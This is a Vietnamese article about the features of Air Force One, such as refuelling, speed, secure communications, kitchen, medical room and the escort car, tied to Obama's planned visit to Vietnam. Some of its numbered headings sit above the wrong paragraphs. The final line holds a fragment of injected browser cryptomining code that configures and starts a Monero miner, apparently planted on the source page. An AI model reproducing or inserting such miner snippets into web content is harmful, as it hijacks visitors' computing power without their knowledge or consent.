Air Force One - Nguyễn Thị Kim Diệp - NLS Huế - sưu tập.

Air Force One.


Ngày 22/5 tới đây, chiếc phi cơ có tên là "Không lực Một" Air Force One dự kiến sẽ chở Tông Tông Obama thăm chính thức xứ Việt.


Hé lộ “Nhà Trắng bay” sắp tới Việt Nam của ông Obama

Thoạt nhìn, Không lực Một (Air Force One) – Phi  cơ của Tổng thống Mỹ giống bất kỳ một chiếc Boeing 747 điển hình. Song thực chất, phi cơ đã được Không quân Mỹ “cải biến” để phù hợp với mục đích phục vụ quá trình di chuyển của Tổng thống. Đến mức, nó có đầy đủ chức năng, và được bảo đảm an ninh như một… “ Tòa Bạch Ốc bay” vậy .
1. Có 2 chiếc “Không lực Một” lận :


Bản thân cái tên “Air Force One” đã ngụ ý rằng:  đó là một chiếc máy bay độc nhất vô nhị. Song trên thực tế, có 2 chiếc máy Boeing 747-200 song sinh giống hệt nhau,  được Không quân Mỹ “thiết lập riêng” nhằm đáp ứng nhu cầu di chuyển, và các công việc hậu cần phục vụ Tổng thống Mỹ.

2. Tiếp nhiên liệu trên không:


Chiếc máy bay phục vụ chủ nhân  Tòa Bạch Ốc không cần phải hạ cánh để tiếp nhiên liệu như máy bay thông thường đâu!  Nó có tính năng có thể tiếp nhiên liệu ngay trên không, với các cần bơm nhiên liệu ngay trên phần đầu của máy bay, giống như phi cơ quân sự vậy, mặc dù tính năng này chỉ được sử dụng trong các tình huống khẩn cấp mà thôi .

3. Bay với tốc độ (gần như)… âm thanh:


Không lực Một có khả năng bay với tốc độ hơn 800 dặm/h (tương đương gần 1000km/h) – tức là bằng với 92% tốc độ âm thanh. Trong vụ khủng bố 11/9/2001, chiến đấu cơ F-16 tháp tùng phi cơ Tổng thống George Bush, khi đó đã phải yêu cầu Phi công điều khiển Không lực Một cho máy bay di chuyển chậm lại, để dễ dàng theo dõi và bảo vệ hơn. Đại tá Mark Tillman – từng là một Phi công Không lực Một khẳng định với ABC News rằng:  phi cơ của Tổng thống Mỹ đã bay gần như với vận tốc của âm thanh.
4. Hệ thống viễn thông “có một không hai”:


Không lực Một được trang bị một hệ thống viễn thông mã hóa nghiêm ngặt nhằm bảo đảm  an toàn cho các cuộc hội đàm của Tổng thống. Không lực Một có tới 87 chiếc điện thoại, giúp cho Tổng thống Mỹ có thể nói chuyện với bất kỳ ai trên thế giới khi đang ở trên không. Trong trường hợp giả định có một cuộc tấn công vào nước Mỹ, Không lực Một lập tức sẽ hoạt động như một Trung tâm chỉ huy trên không, với Internet tốc độ cao, và truyền hình trực tuyến.
5. Những căn phòng “siêu rộng” trên máy bay:

Tổng thống và các hành khách cùng đi có thể sử dụng tới 372 m2 diện tích của phi cơ riêng. Khu vực dành riêng cho Tổng thống bao gồm: giường ngủ, phòng tắm riêng, vòi sen, Phòng Tổng thống, và Phòng Tình huống khẩn cấp. Với các chuyến bay đường dài, máy chạy bộ sẽ được bố đặt ở khu vực này, phục vụ cho việc tập thể dục. Ngoài ra, phi cơ có một cơ sở Y tế riêng, và 2 khu bếp lận .

6. Căn bếp đặc biệt:


Trên các chuyến bay thương mại thông thường, bạn sẽ được phục vụ những bữa ăn hết sức đơn giản. Nhưng khu bếp của Không lực Một được thiết kế đủ để phục vụ cho Tổng thống, đội ngũ nhân viên, đội ngũ Báo chí Phóng viên lên tới …  tổng cộng 100 người, với các loại thực phẩm được chuẩn bị, và kiểm soát nghiêm ngặt. Thậm chí, đầu bếp Không lực Một có đủ nguồn thực phẩm để mở một …  cửa hàng tạp hóa ngay trên chiếc máy bay đặc biệt này luôn .
7. “Thiên Thần của bầu trời” :


Không lực Một là tên được biết đến phổ biến nhất của chiếc phi cơ chở Tổng thống Mỹ, song, trong Không Quân, nó được gọi là “VC-25A”, tên phân loại là “Angel” (Thiên Thần).

8. Hệ thống phòng thủ điện tử đặc biệt:


Mặc dù các chi tiết về khả năng phòng thủ của Không lực Một là điều tối mật, song, Không lực Một được trang bị như một chiến đấu cơ với khả năng chống lại tấn công nguyên tử, hay hỏa tiễn .  Chiếc máy bay đặc biệt này cũng được trang bị hệ thống phòng thủ điện tử đặc biệt, có thể gây nhiễu radar của đối phương luôn .

Chắc chắn, một Bác sĩ chuyên trách sức khỏe Tổng thống luôn hiện diện trên các chuyến bay của Không lực Một, song, cơ sở Y tế trên chiếc máy bay này cũng được trang bị các cơ sở vật chất tối tân nhất, sẵn sàng phục vụ trong các trường hợp khẩn cấp. Bên cạnh các trang thiết bị và dụng cụ y tế hiện đại, khu vực cấp cứu luôn có sẵn lượng máu dự trữ, cùng nhóm máu với Tổng thống luôn .
9. “Phòng cấp cứu bay”:

Bất cứ nơi nào Tổng thống đến, một chiếc xe chống đạn đặc biệt vốn được mệnh danh là “Quái vật”, luôn được đưa sẵn lên một phi cơ quân sự tháp tùng vị chủ nhân  Tòa Bạch Ốc. Chiếc xe sẽ đến đích trước Tổng thống, chờ sẵn ở vị trí thuận lợi nhất, để đón chủ nhân ngay khi ông rời phi  cơ.
10. “Quái vật” bất ly thân:

Từ ngày 22/5 tới, Tổng thống Mỹ Barack Obama sẽ có chuyến thăm chính thức CS Việt Nam. Trang web chính thức của Tòa Bạch Ốc, cũng như Bộ Ngoại giao CS Việt Nam đã xác nhận nguồn  tin này. Chuyến thăm được kỳ vọng sẽ thúc đẩy mối quan hệ song phương Mỹ - CS Việt trên nhiều lĩnh vực quan trọng. Như thường lệ, Tông Tông Obama sẽ xuất hiện trên chiếc Không lực Một nổi tiếng, và dự kiến sẽ di chuyển trên đường phố xứ Việt  bằng siêu xe “Quái vật” của mình na.

', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();